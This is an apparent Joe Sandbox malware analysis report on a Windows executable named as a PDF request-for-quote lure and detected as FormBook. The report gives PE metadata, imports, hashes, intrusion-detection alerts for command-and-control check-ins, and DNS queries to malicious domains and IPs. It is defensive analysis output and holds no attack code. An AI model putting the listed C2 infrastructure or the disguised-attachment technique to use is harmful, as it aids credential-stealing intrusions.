                                                                                                      https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.backstretch.store/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.simo1simo001.clickReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.40.196 | www.7b5846.online | United States | 13335 | CLOUDFLARENETUS | true
164.92.166.75 | www.simo1simo001.click | United States | 46930 | ASN-DPSDUS | true
104.21.80.156 | www.gequiltdesins.shop | United States | 13335 | CLOUDFLARENETUS | true
172.104.236.215 | ilsgroup.net | United States | 63949 | LINODE-APLinodeLLCUS | true
217.21.91.24 | maheshg.xyz | United Kingdom | 12491 | IPPLANET-ASIL | true
                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                        Analysis ID:1589987
                                                                                                        Start date and time:2025-01-13 13:04:10 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 11m 50s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:15
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:1
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Sample name:RFQ PC25-1301 Product Specifications_PDF.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.evad.winEXE@10/1@12/5
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        • Number of executed functions: 43
                                                                                                        • Number of non-executed functions: 298
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 20.190.160.22, 20.103.156.88, 172.202.163.200, 2.22.50.227, 150.171.29.10, 20.223.35.26, 2.23.227.208, 2.23.242.162
                                                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • VT rate limit hit for: RFQ PC25-1301 Product Specifications_PDF.exe
Time | Type | Description
07:05:33 | API Interceptor | 6148353x Sleep call for process: explorer.exe modified
07:06:07 | API Interceptor | 5628362x Sleep call for process: help.exe modified
                                                                                                              Process:C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):189440
                                                                                                              Entropy (8bit):7.866592094662498
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:+UlOjJSJmfkhT/AdHmwHDEXqXDX6MjWnwjAaTEh8beIiKI/r3yX9eY4pN2ljvRT7:rOjJSJmfmE55DQqD6MjawjAaQ+CDZWYO
                                                                                                              MD5:6057FF19BA412F717BB4EE8F31CDD910
                                                                                                              SHA1:B496DF49941FFD69B9EEFA05BB0A41F04CBE0A1F
                                                                                                              SHA-256:CD28D8DF13068C00E4F468FF7AEBBEDF8701160F3E731B51AA4C7FD219B802B9
                                                                                                              SHA-512:4F079CD9D19E1F518F7FB16401218D570195DD2ACFA7C49F68664988CD2328E7FAA82F172E9D86D9C083B99A3682549C48A72856EAC9F029479B1F4EE3DB632A
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):6.9941522367683335
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:RFQ PC25-1301 Product Specifications_PDF.exe
                                                                                                              File size:1'790'464 bytes
                                                                                                              MD5:f1cb41be3365b899a74d919df902fc08
                                                                                                              SHA1:befff58e08b3adc2058f51c884067e59708e17d3
                                                                                                              SHA256:d59aedcde68dc8275a3ad53be28c1588790b2e5da2258a66d4492c5a7c67a7c1
                                                                                                              SHA512:17ebb6eb1c3273dd3326267fe0633dbedf737ff8a90282e92d91141a1f6ae81037afe3b42f0c3e0e20301045168bc0be81aa26d3d11bce826c0d5b5d1413adc8
                                                                                                              SSDEEP:24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8aFhKG+mre6oRTOtTOUIClacTL:KTvC/MTQYxsWR7aFhKG+mrJ+OtNIU
                                                                                                              TLSH:9385D0023390CEA2FF5697324FA9F752577C6E269133D24F23942A79BE709A4013E653
                                                                                                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                                              Icon Hash:17394d716d69338e
                                                                                                              Entrypoint:0x420577
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x6784B0F8 [Mon Jan 13 06:21:44 2025 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:1
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:1
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:1
                                                                                                              Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                                              Instruction
                                                                                                              Programming Language:
                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                              • [IMP] VS2008 SP1 build 30729
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xde780 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1b3000 | 0x7594 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xd4000 | 0xde780 | 0xde800 | 6653ed7a27635726cb185f3993cb17a0 | False | 0.7047785726825843 | data | 7.140139325357158 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x1b3000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xd45d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xd4700 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xd4828 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xd4950 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | Great Britain | 0.34382119714767584 |
| RT_ICON | 0x116978 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.4301727197444694 |
| RT_ICON | 0x1271a0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | Great Britain | 0.5156874080302711 |
| RT_ICON | 0x130648 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | Great Britain | 0.5365526802218115 |
| RT_ICON | 0x135ad0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain | 0.5247401983939537 |
| RT_ICON | 0x139cf8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5785269709543569 |
| RT_ICON | 0x13c2a0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6036585365853658 |
| RT_ICON | 0x13d348 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | Great Britain | 0.6827868852459016 |
| RT_ICON | 0x13dcd0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7535460992907801 |
| RT_MENU | 0x13e138 | 0x50 | data | English | Great Britain | 0.9 |
| RT_STRING | 0x13e188 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
| RT_STRING | 0x13e71c | 0x68a | data | English | Great Britain | 0.2735961768219833 |
| RT_STRING | 0x13eda8 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
| RT_STRING | 0x13f238 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0x13f834 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0x13fe90 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
| RT_STRING | 0x1402f8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
| RT_RCDATA | 0x140450 | 0x71da4 | data | | | 1.0003237980872326 |
| RT_GROUP_ICON | 0x1b21f4 | 0x84 | data | English | Great Britain | 0.7196969696969697 |
| RT_GROUP_ICON | 0x1b2278 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x1b228c | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x1b22a0 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x1b22b4 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
| RT_MANIFEST | 0x1b2390 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
| DLL | Import |
|---|---|
| WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect |
| VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
| MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W |
| WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable |
| PSAPI.DLL | GetProcessMemoryInfo |
| IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile |
| USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile |
| UxTheme.dll | IsThemeActive |
| KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW |
| USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient |
| GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath |
| COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
| ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW |
| SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW |
| ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket |
| OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | Great Britain | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-13T13:06:02.674559+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49738 | 164.92.166.75 | 80 | TCP |
| 2025-01-13T13:06:02.674559+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49738 | 164.92.166.75 | 80 | TCP |
| 2025-01-13T13:06:02.674559+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49738 | 164.92.166.75 | 80 | TCP |
| 2025-01-13T13:06:22.815300+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49751 | 172.104.236.215 | 80 | TCP |
| 2025-01-13T13:06:22.815300+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49751 | 172.104.236.215 | 80 | TCP |
| 2025-01-13T13:06:22.815300+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49751 | 172.104.236.215 | 80 | TCP |
| 2025-01-13T13:06:42.498046+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49752 | 104.21.40.196 | 80 | TCP |
| 2025-01-13T13:06:42.498046+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49752 | 104.21.40.196 | 80 | TCP |
| 2025-01-13T13:06:42.498046+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49752 | 104.21.40.196 | 80 | TCP |
| 2025-01-13T13:07:24.284359+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49753 | 217.21.91.24 | 80 | TCP |
| 2025-01-13T13:07:24.284359+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49753 | 217.21.91.24 | 80 | TCP |
| 2025-01-13T13:07:24.284359+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49753 | 217.21.91.24 | 80 | TCP |
| 2025-01-13T13:08:05.002852+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49755 | 104.21.80.156 | 80 | TCP |
| 2025-01-13T13:08:05.002852+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49755 | 104.21.80.156 | 80 | TCP |
| 2025-01-13T13:08:05.002852+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49755 | 104.21.80.156 | 80 | TCP |
| 2025-01-13T13:08:46.057105+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49756 | 104.18.188.223 | 80 | TCP |
| 2025-01-13T13:08:46.057105+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49756 | 104.18.188.223 | 80 | TCP |
| 2025-01-13T13:08:46.057105+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49756 | 104.18.188.223 | 80 | TCP |
| 2025-01-13T13:09:28.139155+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.6 | 49757 | 23.225.71.166 | 80 | TCP |
                                                                                                              2025-01-13T13:09:28.139155+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.64975723.225.71.16680TCP
                                                                                                              2025-01-13T13:09:28.139155+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.64975723.225.71.16680TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 13, 2025 13:06:02.045589924 CET | 192.168.2.6 | 1.1.1.1 | 0x33d2 | Standard query (0) | www.simo1simo001.click | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:06:22.044751883 CET | 192.168.2.6 | 1.1.1.1 | 0xf947 | Standard query (0) | www.ilsgroup.net | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:06:41.998478889 CET | 192.168.2.6 | 1.1.1.1 | 0x4c92 | Standard query (0) | www.7b5846.online | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:07:02.747208118 CET | 192.168.2.6 | 1.1.1.1 | 0xfa5a | Standard query (0) | www.91uvq.pro | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:07:23.561095953 CET | 192.168.2.6 | 1.1.1.1 | 0xcdeb | Standard query (0) | www.maheshg.xyz | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:07:44.032860041 CET | 192.168.2.6 | 1.1.1.1 | 0xf464 | Standard query (0) | www.hair-transplantation-65829.bond | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:08:04.482732058 CET | 192.168.2.6 | 1.1.1.1 | 0xf942 | Standard query (0) | www.gequiltdesins.shop | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:08:24.920563936 CET | 192.168.2.6 | 1.1.1.1 | 0x8e5 | Standard query (0) | www.backstretch.store | A (IP address) | IN (0x0001) | false
